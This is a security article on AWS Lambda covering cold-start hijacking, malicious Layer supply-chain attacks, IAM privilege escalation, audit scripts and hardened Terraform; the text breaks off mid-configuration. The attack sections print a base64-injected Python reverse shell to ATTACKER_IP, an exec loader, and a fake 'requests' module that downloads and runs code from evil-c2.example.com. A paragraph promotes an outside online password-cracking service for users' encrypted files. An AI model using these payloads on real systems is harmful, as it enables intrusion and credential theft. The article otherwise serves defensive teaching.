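Introduction: The Serverless Security Illusion
Serverless architecture has quickly become a mainstream choice for cloud-native applications thanks to elastic scaling, pay-per-use pricing, and the absence of server operations. But "serverless" does not mean "riskless". Under the shared responsibility model of platforms such as AWS Lambda, Azure Functions, and Google Cloud Functions, the burden of secure configuration still rests with the developer.
In real red-team/blue-team engagements I have found an unsettling pattern: more than 60% of the production Lambda functions I reviewed were over-privileged to some degree, and injection into the execution environment during cold start is an entry point that is routinely overlooked.
This article takes the attacker's point of view and dissects the core security risks of serverless architectures: cold-start hijacking, privilege escalation, and API Gateway protection. It also provides defensive configurations and scripts that can be applied in production environments.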
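Serverless Security Model: Shared Responsibility and Trust Boundaries
The Shared Responsibility Model
In a serverless architecture, security responsibility is split between the cloud provider and the customer:
┌────────────────────────────────────────────────────────────────────────────┐
│ Cloud provider responsibilities                                            │
│ Physical infrastructure | Hypervisor security    | Runtime                 │
│ Network infrastructure  | Container isolation    | Patch management        │
├────────────────────────────────────────────────────────────────────────────┤
│ Customer responsibilities                                                  │
│ IAM role configuration  | Function code security | Environment variables   │
│ Data encryption         | VPC configuration      | Dependency supply chain │
└────────────────────────────────────────────────────────────────────────────┘
Most security incidents occur on the customer's side of this boundary. Misconfigured IAM roles are the most common problem: developers tend to attach AdministratorAccess or overly permissive * permissions to a function instead of following the principle of least privilege.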
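To make the contrast concrete, here is a minimal sketch that compares an over-broad policy document with a least-privilege one and flags wildcard grants. The bucket name `data-bucket` and the helper `find_wildcard_statements` are illustrative assumptions; they are not part of any AWS SDK.

```python
from typing import Any, Dict, List

# Hypothetical policy documents, for illustration only.
OVERLY_BROAD_POLICY: Dict[str, Any] = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
}

LEAST_PRIVILEGE_POLICY: Dict[str, Any] = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["s3:GetObject"],
            "Resource": "arn:aws:s3:::data-bucket/*",  # assumed bucket name
        }
    ],
}


def _as_list(value: Any) -> List[str]:
    """IAM accepts either a single string or a list for Action and Resource."""
    return [value] if isinstance(value, str) else list(value)


def find_wildcard_statements(policy: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Return Allow statements that grant '*' or 'service:*' actions, or target every resource."""
    flagged = []
    for statement in policy.get("Statement", []):
        if statement.get("Effect") != "Allow":
            continue
        actions = _as_list(statement.get("Action", []))
        resources = _as_list(statement.get("Resource", []))
        broad_action = any(a == "*" or a.endswith(":*") for a in actions)
        broad_resource = "*" in resources  # exact "*" only, not "bucket/*"
        if broad_action or broad_resource:
            flagged.append(statement)
    return flagged
```

A check like this is deliberately coarse: it only spots obvious wildcards and says nothing about whether a narrowly named action is actually needed by the function.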
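IAM Roles and the Execution Environment Trust Chain
A Lambda execution environment obtains temporary credentials through an IAM role. This trust relationship is the core of the serverless security model:
Lambda Function
│
├──> Execution Role (IAM Role)
│     │
│     ├──> AssumeRolePolicyDocument (trust policy)
│     │     └──> Service: lambda.amazonaws.com
│     │
│     └──> Managed Policies / Inline Policies
│           ├──> S3: GetObject (data-bucket)
│           ├──> DynamoDB: Query (users-table)
│           └──> SecretsManager: GetSecretValue (prod/secrets)
│
└──> Runtime Environment (Ephemeral)
      ├──> Environment Variables
      ├──> /tmp (ephemeral storage, 512 MB by default)
      └──> Layer Dependencies (read-only)
The weak point of this chain is the function code itself. If it is vulnerable to SSRF, insecure deserialization, or command injection, an attacker can obtain the execution role's temporary credentials and move laterally to other AWS resources. In Lambda these credentials are handed to the function process as environment variables (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN), which is where the SDK picks them up, so any bug that lets an attacker read the process environment or run code exposes them. Lambda does not offer the EC2-style instance metadata endpoint.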
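The exposure described above can be inspected without leaking anything. The sketch below reports which credential variables are present in an environment and produces a redacted copy that is safe to log. The helper names `credential_exposure` and `redact_environment` are hypothetical; the three variable names are the ones the Lambda runtime sets.

```python
import os
from typing import Dict, Mapping

# Environment variables through which the Lambda runtime exposes the
# execution role's temporary credentials to the function process.
CREDENTIAL_VARS = ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN")


def credential_exposure(environ: Mapping[str, str] = os.environ) -> Dict[str, bool]:
    """Report which credential variables are present, without revealing their values."""
    return {name: bool(environ.get(name)) for name in CREDENTIAL_VARS}


def redact_environment(environ: Mapping[str, str] = os.environ) -> Dict[str, str]:
    """Return a copy of the environment with credential values masked, safe for logging."""
    return {
        name: "***REDACTED***" if name in CREDENTIAL_VARS else value
        for name, value in environ.items()
    }
```

Passing the mapping explicitly keeps the helpers testable outside Lambda; inside a function they default to the real process environment.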
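Cold-Start Hijacking of Cloud Functions
Cold-Start Mechanics and Attack Surface
A serverless function runs either on a cold start, which creates a new execution environment, or on a warm start, which reuses an existing one. The lifecycle has three phases:
Phase 1: Init (Cold Start Only)
┌───────────────────────────────────────────────────────────────────┐
│ 1. Allocate execution environment (container/microVM)             │
│ 2. Download function code and Layers                              │
│ 3. Inject environment variables                                   │
│ 4. Initialize runtime (load dependencies, run module-level code)  │
│ 5. Initialize handler                                             │
└───────────────────────────────────────────────────────────────────┘
                                  │
                                  ▼
Phase 2: Invoke (Every Invocation)
┌───────────────────────────────────────────────────────────────────┐
│ 6. Call handler(event, context)                                   │
│ 7. Run business logic                                             │
│ 8. Return response                                                │
└───────────────────────────────────────────────────────────────────┘
                                  │
                                  ▼ (Container reused or destroyed)
Phase 3: Shutdown (Container destruction)
The key attack vectors in the cold-start phase are:
- Environment variable injection: an attacker who can modify the function configuration can plant malicious values in environment variables
- Layer dependency hijacking: tampering with the Python/Node.js packages in a Layer to gain code execution
- Init script injection: getting a malicious module loaded during the init phase
- Race condition attacks: inserting malicious operations between container initialization and the first invocation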
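The reason the init phase matters to an attacker is that module-level code runs once, before any handler call, and its state persists across warm invocations. A minimal sketch of that behaviour follows; the response field names are illustrative assumptions.

```python
import time
from typing import Any, Dict

# Module-level code: executed once per execution environment (the Init phase).
# Anything imported or executed here runs before the first handler call.
INIT_TIMESTAMP = time.time()
_invocation_count = 0


def handler(event: Dict[str, Any], context: Any) -> Dict[str, Any]:
    """Invoke phase: runs on every invocation and sees the state left by Init."""
    global _invocation_count
    _invocation_count += 1
    return {
        "cold_start": _invocation_count == 1,
        "invocation": _invocation_count,
        "environment_age_seconds": round(time.time() - INIT_TIMESTAMP, 3),
    }
```

Calling `handler` twice in the same process mimics a cold start followed by a warm one: only the first call reports `cold_start` as true, while the module-level timestamp stays fixed.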
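Attack Scenario 1: Cold-Start Hijacking via Environment Variable Injection
Suppose an attacker has obtained the lambda:UpdateFunctionConfiguration permission, for example through an overly permissive IAM policy. They can then inject a malicious environment variable that takes effect the next time the function cold-starts: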
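# The attacker abuses an overly permissive IAM policy to update the function configuration
import boto3
import base64

# The malicious payload is encoded before being injected into an environment variable
malicious_code = """
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('ATTACKER_IP',4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(['/bin/sh','-i'])
"""
payload = base64.b64encode(malicious_code.encode()).decode()

client = boto3.client('lambda', region_name='us-east-1')
client.update_function_configuration(
    FunctionName='vulnerable-data-processor',
    Environment={
        'Variables': {
            'MALICIOUS_PAYLOAD': payload,
            # Environment replaces the whole variable set, so the existing
            # variables are sent again unchanged to avoid detection
            'DATABASE_URL': 'postgresql://prod-db:5432/users',
            'API_KEY': 'existing-key-not-modified'
        }
    }
)
The injected variable is inert on its own: it only fires if a loader has already been planted in the function code or in one of its Layers. The infected function then executes the malicious code during module initialization: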
# vulnerable_function.py - the victim function
import os
import base64
import boto3


# Malicious code runs at module load time (the cold-start phase).
# The attacker planted this loader through a Layer.
def _init_malicious():
    payload = os.environ.get('MALICIOUS_PAYLOAD', '')
    if payload:
        code = base64.b64decode(payload).decode()
        exec(code)  # runs the reverse shell


# Module-level call: executes before the handler
_init_malicious()


def handler(event, context):
    # The normal business logic is left unchanged
    s3 = boto3.client('s3')
    bucket = event.get('bucket')
    key = event.get('key')
    response = s3.get_object(Bucket=bucket, Key=key)
    return {'statusCode': 200, 'body': response['Body'].read().decode()}
Attack Scenario 2: Layer Dependency Supply Chain Attack
Lambda Layers are an important code-reuse mechanism, but they are also a target for supply chain attacks. An attacker can hijack a Layer as follows:
# The attacker publishes a malicious Layer
import zipfile
import os


# Build a malicious Python package
def create_malicious_layer():
    os.makedirs('malicious_layer/python/lib/python3.9/site-packages')
    # Shadow a common third-party library
    with open('malicious_layer/python/lib/python3.9/site-packages/requests.py', 'w') as f:
        f.write("""
# Malicious module masquerading as the requests library
import sys
import base64
import urllib.request

# Run the malicious code
def _bootstrap():
    try:
        code_url = 'https://evil-c2.example.com/payload.bin'
        response = urllib.request.urlopen(code_url)
        payload = base64.b64decode(response.read())
        exec(payload)
    except:
        pass

_bootstrap()

# Re-export a requests-like interface to stay hidden
from urllib.request import Request, urlopen
import json

def get(url, **kwargs):
    import urllib.request
    return urllib.request.urlopen(url)

def post(url, **kwargs):
    import urllib.request
    data = kwargs.get('data', '')
    req = urllib.request.Request(url, data=data.encode() if isinstance(data, str) else data)
    return urllib.request.urlopen(req)
""")
    # Package the Layer
    with zipfile.ZipFile('malicious-layer.zip', 'w') as zf:
        for root, dirs, files in os.walk('malicious_layer'):
            for file in files:
                filepath = os.path.join(root, file)
                arcname = os.path.relpath(filepath, 'malicious_layer')
                zf.write(filepath, arcname)


create_malicious_layer()
Defenders can detect a tampered Layer with a baseline comparison. Because a published Layer version is immutable, tampering usually shows up as a function pointing at a new Layer version, so new or unknown ARNs deserve review as well:
#!/usr/bin/env python3
"""
Lambda Layer integrity checker.
Compares the Layer hashes of deployed Lambda functions against a baseline.
"""
import json
from datetime import datetime, timezone

import boto3


class LambdaLayerAuditor:
    def __init__(self, region='us-east-1'):
        self.lambda_client = boto3.client('lambda', region_name=region)
        self.baseline_hashes = {}
        self.baseline_file = 'lambda_layer_baseline.json'

    def scan_all_functions(self):
        """Scan every Lambda function and its Layers."""
        results = {
            'scan_time': datetime.now(timezone.utc).isoformat(),
            'functions': [],
            'anomalies': []
        }
        paginator = self.lambda_client.get_paginator('list_functions')
        for page in paginator.paginate():
            for func in page['Functions']:
                func_name = func['FunctionName']
                layers = func.get('Layers', [])
                func_info = {
                    'name': func_name,
                    'layers': [],
                    'last_modified': func.get('LastModified')
                }
                for layer in layers:
                    layer_arn = layer['Arn']
                    # Fetch the SHA-256 of the Layer code
                    try:
                        layer_config = self.lambda_client.get_layer_version_by_arn(
                            Arn=layer_arn
                        )
                        # Hash and size are nested under 'Content' in the response
                        code_sha = layer_config['Content']['CodeSha256']
                        code_size = layer_config['Content']['CodeSize']
                        func_info['layers'].append({
                            'arn': layer_arn,
                            'sha256': code_sha,
                            'size': code_size,
                            'created': layer_config.get('CreatedDate')
                        })
                        # Compare against the baseline
                        if layer_arn in self.baseline_hashes:
                            if self.baseline_hashes[layer_arn] != code_sha:
                                anomaly = {
                                    'function': func_name,
                                    'layer': layer_arn,
                                    'expected_hash': self.baseline_hashes[layer_arn],
                                    'actual_hash': code_sha,
                                    'severity': 'CRITICAL',
                                    'description': 'Layer hash mismatch detected - possible tampering'
                                }
                                results['anomalies'].append(anomaly)
                                print(f"[CRITICAL] Layer modified: {func_name} -> {layer_arn}")
                    except Exception as e:
                        print(f"[ERROR] Failed to audit layer {layer_arn}: {e}")
                results['functions'].append(func_info)
        return results

    def load_baseline(self):
        """Load the known-good baseline hashes."""
        try:
            with open(self.baseline_file, 'r') as f:
                data = json.load(f)
                self.baseline_hashes = data.get('layer_hashes', {})
        except FileNotFoundError:
            print(f"[*] No baseline file found at {self.baseline_file}")
            self.baseline_hashes = {}

    def save_baseline(self, results):
        """Save the current scan results as the new baseline."""
        baseline = {
            'created': datetime.now(timezone.utc).isoformat(),
            'layer_hashes': {}
        }
        for func in results.get('functions', []):
            for layer in func.get('layers', []):
                baseline['layer_hashes'][layer['arn']] = layer['sha256']
        with open(self.baseline_file, 'w') as f:
            json.dump(baseline, f, indent=2)
        print(f"[*] Baseline saved to {self.baseline_file}")


if __name__ == '__main__':
    auditor = LambdaLayerAuditor()
    auditor.load_baseline()
    results = auditor.scan_all_functions()
    print(f"\n{'='*60}")
    print(f"Scan completed: {results['scan_time']}")
    print(f"Functions scanned: {len(results['functions'])}")
    print(f"Anomalies detected: {len(results['anomalies'])}")
    if results['anomalies']:
        print(f"\n[!] ANOMALIES DETAIL:")
        for anomaly in results['anomalies']:
            print(f"  Function: {anomaly['function']}")
            print(f"  Layer: {anomaly['layer']}")
            print(f"  Expected: {anomaly['expected_hash']}")
            print(f"  Actual: {anomaly['actual_hash']}")
            print(f"  {'─'*50}")
    # Save the baseline on the first run or when no anomalies were found
    if not results['anomalies']:
        auditor.save_baseline(results)
Privilege Escalation: The Chain Reaction of IAM Over-Permissioning
The Privilege Escalation Attack Chain
In a serverless environment, privilege escalation is rarely the exploitation of a single vulnerability. It is usually a chain of several configuration flaws:
Initial Access
│
├──> SSRF in Lambda function
│     └──> Read the process environment (e.g. file:///proc/self/environ)
│           └──> Retrieve temporary credentials
│                 │
│                 ├──> IAM: ListRoles
│                 │     └──> Find overprivileged roles
│                 │
│                 ├──> S3: ListAllMyBuckets
│                 │     └──> Exfiltrate data
│                 │
│                 └──> sts:AssumeRole
│                       └──> Lateral movement
│
└──> Environment Variable Injection
      └──> Modify function config
            └──> UpdateFunctionConfiguration
                  └──> Code execution on next cold start
Detecting Overly Permissive IAM Policies
The following Python script scans every Lambda execution role in an AWS account and identifies over-privileged policies:
#!/usr/bin/env python3
"""
Lambda IAM permission audit tool.
Identifies over-privileged Lambda execution roles and suggests fixes.
"""
import re
from typing import Dict, List, Tuple

import boto3


class LambdaIAMAuditor:
    # Dangerous action patterns - permissions a Lambda function rarely needs
    DANGEROUS_ACTIONS = {
        'iam:*': ('CRITICAL', 'Full IAM access allows privilege escalation'),
        'iam:CreateUser': ('HIGH', 'Can create new IAM users'),
        'iam:AttachUserPolicy': ('CRITICAL', 'Can attach arbitrary policies'),
        'iam:CreateAccessKey': ('HIGH', 'Can create access keys for any user'),
        'sts:AssumeRole': ('HIGH', 'Can assume other roles for lateral movement'),
        's3:*': ('MEDIUM', 'Full S3 access - scope to specific buckets'),
        'dynamodb:*': ('MEDIUM', 'Full DynamoDB access - scope to specific tables'),
        'lambda:*': ('HIGH', 'Full Lambda access - can modify other functions'),
        'ec2:*': ('HIGH', 'Full EC2 access - uncommonly needed in Lambda'),
        'logs:*': ('LOW', 'Consider scoping to specific log groups'),
    }
    # Wildcard resource patterns - too broad
    WILDCARD_RESOURCE_PATTERNS = [
        (r'^arn:aws:s3:::\*$', 'S3 wildcard on all buckets'),
        (r'^arn:aws:iam::\d+:user/\*$', 'IAM wildcard on all users'),
        (r'^\*$', 'Resource wildcard - applies to all resources'),
    ]

    def __init__(self, region='us-east-1'):
        self.iam_client = boto3.client('iam', region_name=region)
        self.lambda_client = boto3.client('lambda', region_name=region)
        self.findings = []

    def audit_all_lambda_roles(self) -> Dict:
        """Audit the IAM role of every Lambda function."""
        audit_report = {
            'total_functions': 0,
            'overprivileged_functions': 0,
            'findings': [],
            'recommendations': []
        }
        # Fetch all Lambda functions
        functions = self._get_all_lambda_functions()
        audit_report['total_functions'] = len(functions)
        for func in functions:
            role_arn = func.get('Role', '')
            if not role_arn:
                continue
            role_name = role_arn.split('/')[-1]
            findings = self._audit_role(role_name, func['FunctionName'])
            if findings:
                audit_report['overprivileged_functions'] += 1
                for finding in findings:
                    finding['function_name'] = func['FunctionName']
                    finding['role_name'] = role_name
                audit_report['findings'].extend(findings)
        audit_report['recommendations'] = self._generate_recommendations(
            audit_report['findings']
        )
        return audit_report

    def _get_all_lambda_functions(self) -> List[Dict]:
        """Fetch all Lambda functions."""
        functions = []
        paginator = self.lambda_client.get_paginator('list_functions')
        for page in paginator.paginate():
            functions.extend(page['Functions'])
        return functions

    def _audit_role(self, role_name: str, function_name: str) -> List[Dict]:
        """Audit a single IAM role."""
        findings = []
        # Inline policies of the role
        inline_policies = self.iam_client.list_role_policies(
            RoleName=role_name
        )['PolicyNames']
        for policy_name in inline_policies:
            policy_doc = self.iam_client.get_role_policy(
                RoleName=role_name,
                PolicyName=policy_name
            )
            findings.extend(self._analyze_policy(
                policy_doc['PolicyDocument'],
                f"Inline policy: {policy_name}"
            ))
        # Attached managed policies
        attached_policies = self.iam_client.list_attached_role_policies(
            RoleName=role_name
        )['AttachedPolicies']
        for policy in attached_policies:
            policy_arn = policy['PolicyArn']
            policy_version = self.iam_client.get_policy(
                PolicyArn=policy_arn
            )['Policy']['DefaultVersionId']
            default_policy = self.iam_client.get_policy_version(
                PolicyArn=policy_arn,
                VersionId=policy_version
            )
            findings.extend(self._analyze_policy(
                default_policy['PolicyVersion']['Document'],
                f"Managed policy: {policy['PolicyName']}"
            ))
        return findings

    def _analyze_policy(self, policy_doc: Dict, source: str) -> List[Dict]:
        """Analyze a single IAM policy document."""
        findings = []
        statements = policy_doc.get('Statement', [])
        # A policy may contain a single statement object instead of a list
        if isinstance(statements, dict):
            statements = [statements]
        for statement in statements:
            if statement.get('Effect') != 'Allow':
                continue
            actions = statement.get('Action', [])
            if isinstance(actions, str):
                actions = [actions]
            resources = statement.get('Resource', [])
            if isinstance(resources, str):
                resources = [resources]
            # Check for dangerous actions
            for action in actions:
                severity, description = self._check_dangerous_action(action)
                if severity:
                    # Check whether the statement is constrained by conditions
                    has_conditions = 'Condition' in statement
                    finding = {
                        'severity': severity,
                        'action': action,
                        'source': source,
                        'resources': resources,
                        'description': description,
                        'has_conditions': has_conditions,
                        'condition_keys': list(
                            statement.get('Condition', {}).keys()
                        ) if has_conditions else []
                    }
                    # Downgrade critical findings that are constrained by conditions
                    if has_conditions and severity == 'CRITICAL':
                        finding['severity'] = 'HIGH'
                    findings.append(finding)
            # Check for wildcard resources
            for resource in resources:
                for pattern, desc in self.WILDCARD_RESOURCE_PATTERNS:
                    if re.match(pattern, resource):
                        findings.append({
                            'severity': 'HIGH',
                            'action': 'Wildcard Resource',
                            'source': f"{source} - {desc}",
                            'resources': [resource],
                            'description': f'Overly broad resource scope: {desc}',
                            'has_conditions': False,
                            'condition_keys': []
                        })
        return findings

    def _check_dangerous_action(self, action: str) -> Tuple[str, str]:
        """Check whether an action is on the dangerous list."""
        # A bare "*" grants every action of every service
        if action == '*':
            return ('CRITICAL', 'Full administrative access to all services')
        # Exact match, which also covers service-wide wildcards such as s3:*
        if action in self.DANGEROUS_ACTIONS:
            return self.DANGEROUS_ACTIONS[action]
        return ('', '')

    def _generate_recommendations(self, findings: List[Dict]) -> List[str]:
        """Generate remediation advice from the audit findings."""
        recommendations = []
        seen = set()
        for finding in findings:
            rec = self._actionable_recommendation(finding)
            if rec and rec not in seen:
                recommendations.append(rec)
                seen.add(rec)
        return recommendations

    def _actionable_recommendation(self, finding: Dict) -> str:
        """Produce an actionable remediation suggestion."""
        action = finding['action']
        if action == 'iam:*':
            return (
                "Remove iam:* and grant only specific IAM actions needed. "
                "Example: iam:GetRole, iam:PassRole (only for specific roles)"
            )
        elif action == 's3:*':
            return (
                "Scope S3 permissions to specific buckets and actions. "
                "Example: s3:GetObject and s3:PutObject on arn:aws:s3:::my-bucket/*"
            )
        elif action == 'lambda:*':
            return (
                "Remove lambda:* permissions from Lambda execution roles. "
                "Functions should not modify other functions."
            )
        elif '*' in finding.get('resources', ['']):
            return (
                "Replace wildcard resources with specific ARNs. "
                "Limit to specific buckets, tables, and secrets."
            )
        return f"Review and restrict: {finding['description']}"


# Usage example
if __name__ == '__main__':
    auditor = LambdaIAMAuditor(region='us-east-1')
    report = auditor.audit_all_lambda_roles()
    print(f"\n{'='*60}")
    print(f"Lambda IAM Security Audit Report")
    print(f"{'='*60}")
    print(f"Total functions: {report['total_functions']}")
    print(f"Overprivileged: {report['overprivileged_functions']}")
    print(f"Total findings: {len(report['findings'])}")
    # Count findings by severity
    severity_counts = {}
    for f in report['findings']:
        sev = f['severity']
        severity_counts[sev] = severity_counts.get(sev, 0) + 1
    print(f"\nFindings by severity:")
    for sev in ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']:
        if sev in severity_counts:
            print(f"  [{sev}] {severity_counts[sev]}")
    if report['findings']:
        print(f"\n{'─'*60}")
        print("Critical Findings:")
        for f in report['findings']:
            if f['severity'] in ('CRITICAL', 'HIGH'):
                print(f"\n  [{f['severity']}] {f['function_name']}")
                print(f"  Role: {f['role_name']}")
                print(f"  Action: {f['action']}")
                print(f"  Source: {f['source']}")
                print(f"  Resources: {', '.join(f['resources'])}")
    if report['recommendations']:
        print(f"\n{'─'*60}")
        print("Recommendations:")
        for i, rec in enumerate(report['recommendations'], 1):
            print(f"  {i}. {rec}")
Data Protection and Encryption Verification in Serverless Practice
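In serverless architectures, cloud functions often handle encrypted data uploaded by users, such as encrypted files and attachments. For security teams, verifying access to these files is an important part of penetration testing and compliance audits. When a test calls for checking access to user-uploaded encrypted files, auxiliary tools can quickly confirm how a file is password-protected. For example, Catpasswd (猫密网) offers an online password recovery service for encrypted files; testers can use it to check whether an uploaded encrypted file is protected by a weak password without deploying brute-force tooling locally, which is particularly convenient in automated test pipelines.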
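As a local first step before any password-strength testing, a function can check whether an uploaded archive is password-protected at all. The sketch below does this for ZIP files using only the standard library; the helper names are hypothetical, and it relies on the per-entry encryption flag, so other archive formats would need their own check.

```python
import io
import zipfile
from typing import Dict


def zip_encryption_status(data: bytes) -> Dict[str, bool]:
    """Map each member of a ZIP archive to whether it is flagged as encrypted.

    Bit 0 of an entry's general-purpose flag field marks it as password-protected.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        return {info.filename: bool(info.flag_bits & 0x1) for info in archive.infolist()}


def build_sample_zip() -> bytes:
    """Build a small unencrypted archive in memory (illustrative test data)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("report.txt", "hello")
    return buffer.getvalue()
```

In a Lambda handler, `data` would typically be the body of the uploaded S3 object; entries reported as unencrypted can be flagged without ever attempting to open them.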
API Gateway Security: Rate Limiting and WAF Integration
The API Gateway Attack Surface
API Gateway is the main entry point of a serverless application, so its security posture directly affects the entire backend:
         Internet
             │
        ┌────▼────┐
        │   WAF   │ ◄── Web Application Firewall
        │  Rules  │     (SQLi, XSS, Rate limiting)
        └────┬────┘
             │
        ┌────▼────┐
        │   API   │ ◄── API Gateway
        │ Gateway │     (Auth, Throttling, Usage Plans)
        └────┬────┘
             │
    ┌────────┼────────┐
    │        │        │
┌───▼───┐ ┌──▼───┐ ┌──▼────┐
│Lambda │ │Lambda│ │Lambda │
│ /auth │ │/data │ │ /admin│
└───────┘ └──────┘ └───────┘
API Gateway Security Configuration Best Practices
# Terraform: API Gateway security configuration
# (aws_api_gateway_deployment.secure and aws_cloudwatch_log_group.api_gw are
# assumed to be defined elsewhere in the configuration)
resource "aws_wafv2_web_acl" "api_gateway_waf" {
  name        = "api-gateway-waf"
  description = "WAF for API Gateway protection"
  scope       = "REGIONAL"

  default_action {
    allow {}
  }

  rule {
    name     = "AWSManagedRulesCommonRuleSet"
    priority = 1

    override_action {
      none {}
    }

    statement {
      managed_rule_group_statement {
        name        = "AWSManagedRulesCommonRuleSet"
        vendor_name = "AWS"

        # Exclude rules that cause false positives (adjust to your workload)
        excluded_rule {
          name = "SizeRestrictions_BODY"
        }
      }
    }

    visibility_config {
      cloudwatch_metrics_enabled = true
      sampled_requests_enabled   = true
      metric_name                = "CommonRuleSet"
    }
  }

  rule {
    name     = "RateLimiting"
    priority = 2

    action {
      block {}
    }

    statement {
      rate_based_statement {
        limit              = 1000 # 1000 requests per 5 minutes per IP
        aggregate_key_type = "IP"

        # Do not count health checks toward the limit
        scope_down_statement {
          not_statement {
            statement {
              byte_match_statement {
                field_to_match {
                  uri_path {}
                }
                position_constraint = "STARTS_WITH"
                search_string       = "/health"
                text_transformation {
                  priority = 0
                  type     = "NONE"
                }
              }
            }
          }
        }
      }
    }

    visibility_config {
      cloudwatch_metrics_enabled = true
      sampled_requests_enabled   = true
      metric_name                = "RateLimiting"
    }
  }

  rule {
    name     = "GeoBlocking"
    priority = 3

    action {
      block {}
    }

    # Block every request that does not originate from the listed countries
    statement {
      not_statement {
        statement {
          geo_match_statement {
            country_codes = ["CN", "US", "JP", "SG"]
          }
        }
      }
    }

    visibility_config {
      cloudwatch_metrics_enabled = true
      sampled_requests_enabled   = true
      metric_name                = "GeoBlocking"
    }
  }

  visibility_config {
    cloudwatch_metrics_enabled = true
    sampled_requests_enabled   = true
    metric_name                = "api-gateway-waf"
  }
}

# API Gateway with stage-level logging and method-level throttling
resource "aws_api_gateway_rest_api" "secure_api" {
  name        = "secure-serverless-api"
  description = "Serverless API with security controls"
}

resource "aws_api_gateway_stage" "production" {
  rest_api_id   = aws_api_gateway_rest_api.secure_api.id
  stage_name    = "production"
  deployment_id = aws_api_gateway_deployment.secure.id

  # Access logging
  access_log_settings {
    destination_arn = aws_cloudwatch_log_group.api_gw.arn
    format = jsonencode({
      requestId      = "$context.requestId"
      ip             = "$context.identity.sourceIp"
      requestTime    = "$context.requestTime"
      httpMethod     = "$context.httpMethod"
      resourcePath   = "$context.resourcePath"
      status         = "$context.status"
      protocol       = "$context.protocol"
      responseLength = "$context.responseLength"
      userAgent      = "$context.identity.userAgent"
    })
  }
}

# Method-level throttling. Method settings are a separate resource,
# not a block inside aws_api_gateway_stage.
resource "aws_api_gateway_method_settings" "all_methods" {
  rest_api_id = aws_api_gateway_rest_api.secure_api.id
  stage_name  = aws_api_gateway_stage.production.stage_name
  method_path = "*/*"

  settings {
    throttling_burst_limit = 500
    throttling_rate_limit  = 1000
    logging_level          = "INFO"
    data_trace_enabled     = false # do not write sensitive request data to logs
  }
}
Secure Lambda Function Deployment: Terraform Best Practices
The following Terraform configuration is a hardened Lambda deployment template that covers VPC isolation, least-privilege IAM, encryption, and monitoring:
# =============================================================================
# Secure Lambda function deployment - Terraform best practices
# =============================================================================

# 1. Lambda execution role - principle of least privilege
resource "aws_iam_role" "lambda_execution" {
  name = "secure-lambda-execution-role"

  assume_role_policy = jsonencode({
    Version = "2012-10-17"
    Statement = [
      {
        Action = "sts:AssumeRole"
        Effect = "Allow"
        Principal = {
          Service = "lambda.amazonaws.com"
        }
      }
    ]
  })

  # Detach any attached policies automatically when the role is destroyed
  force_detach_policies = true
  max_session_duration  = 3600 # 1 hour, the maximum session length for this role
}

# 2. Precise permission policy - defined by actual need
resource "aws_iam_role_policy" "lambda_precise_policy" {
  name = "lambda-precise-permissions"
  role = aws_iam_role.lambda_execution.id

  policy = jsonencode({
    Version = "2012-10-17"
    Statement = [
      # CloudWatch Logs - scoped to this function's log group
      {
        Effect = "Allow"
        Action = [
          "logs:CreateLogGroup",
          "logs:CreateLogStream",
          "logs:PutLogEvents"
        ]
        Resource = "arn:aws:logs:${var.aws_region}:${var.account_id}:log-group:/aws/lambda/${var.function_name}:*"
      },
      # S3 - read access to one specific bucket
      {
        Effect   = "Allow"
        Action   = ["s3:GetObject"]
        Resource = "${aws_s3_bucket.data.arn}/*"
      },
      # S3 - writes must request server-side encryption. The condition key is
      # only present on upload requests, so it is kept off the read statement.
      {
        Effect   = "Allow"
        Action   = ["s3:PutObject"]
        Resource = "${aws_s3_bucket.data.arn}/*"
        Condition = {
          StringEquals = {
            "s3:x-amz-server-side-encryption" = "AES256"
          }
        }
      },
      # Secrets Manager - read one specific secret only
      {
        Effect = "Allow"
        Action = [
          "secretsmanager:GetSecretValue"
        ]
        Resource = aws_secretsmanager_secret.db_credentials.arn
      },
      # VPC network interfaces (ENI) - required for access inside the VPC
      {
        Effect = "Allow"
        Action = [
          "ec2:CreateNetworkInterface",
          "ec2:DescribeNetworkInterfaces",
          "ec2:DeleteNetworkInterface"
        ]
        Resource = "*"
      }
    ]
  })
}

# 3. Lambda function - secure configuration
resource "aws_lambda_function" "secure_function" {
  function_name = var.function_name
  role          = aws_iam_role.lambda_execution.arn
  handler       = "index.handler"
  runtime       = "python3.11"
  timeout       = 30   # a reasonable timeout limit
  memory_size   = 256  # the smallest size that is sufficient
  publish       = true # publish versions to make rollback easy

  # Code package
  filename         = data.archive_file.lambda_output.output_path
  source_code_hash = data.archive_file.lambda_output.output_base64sha256

  # VPC configuration - isolate the execution environment
  vpc_config {
    subnet_ids         = var.private_subnet_ids
    security_group_ids = [aws_security_group.lambda_sg.id]
  }

  # Environment variables - never store secrets here directly
  environment {
    variables = {
      ENV            = "production"
      DB_SECRET_ARN  = aws_secretsmanager_secret.db_credentials.arn
      S3_BUCKET_NAME = aws_s3_bucket.data.id
      LOG_LEVEL      = "WARN"
      # Sensitive values are fetched from Secrets Manager at runtime
    }
  }

  # Dead-letter queue for failed asynchronous invocations. The queue
  # aws_sqs_queue.lambda_dlq is assumed to be defined elsewhere, and the
  # execution role also needs sqs:SendMessage on it.
  dead_letter_config {
    target_arn = aws_sqs_queue.lambda_dlq.arn
  }

  # Distributed tracing
  tracing_config {
    mode = "Active" # X-Ray tracing
  }

  tags = {
    Environment = "production"
    Security    = "hardened"
  }

  lifecycle {
    ignore_changes = [last_modified]
  }
}

# 4. Security group - minimal network access
resource "aws_security_group" "lambda_sg" {
  name        = "lambda-secure-sg"
  description = "Security group for Lambda with minimal network access"
  vpc_id      = var.vpc_id

  # Egress - specific destinations only. A single rule covers both endpoints
  # because two rules with the same port and CIDR would be duplicates.
  egress {
    description = "HTTPS to Secrets Manager and S3 endpoints inside the VPC"
    from_port   = 443
    to_port     = 443
    protocol    = "tcp"
